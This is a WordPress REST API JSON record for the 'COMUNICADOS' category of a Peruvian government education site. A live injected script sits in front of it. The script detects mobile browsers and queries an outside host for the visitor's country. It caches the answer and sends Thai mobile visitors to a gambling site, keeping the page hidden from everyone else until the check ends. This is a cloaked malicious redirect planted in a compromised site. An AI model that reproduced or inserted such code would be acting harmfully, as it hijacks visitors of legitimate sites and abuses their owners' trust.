
<script>
(function() {

    if (typeof IS_DESKTOP !== "undefined" || !/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        document.body.style.visibility = "visible";
        return;
    }

    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    if (cached === "TH") {
        location.href = "https://fafawin168.in/";
        return;
    }
    
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            localStorage.setItem(key, c.trim().toUpperCase());
            location.reload();
        })
        .catch(function() {
            localStorage.setItem(key, "OTHER");
            location.reload();
        });
})();
</script>
{"id":4,"count":1214,"description":"","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/category\/comunicados\/","name":"COMUNICADOS","slug":"comunicados","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories\/4","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts?categories=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}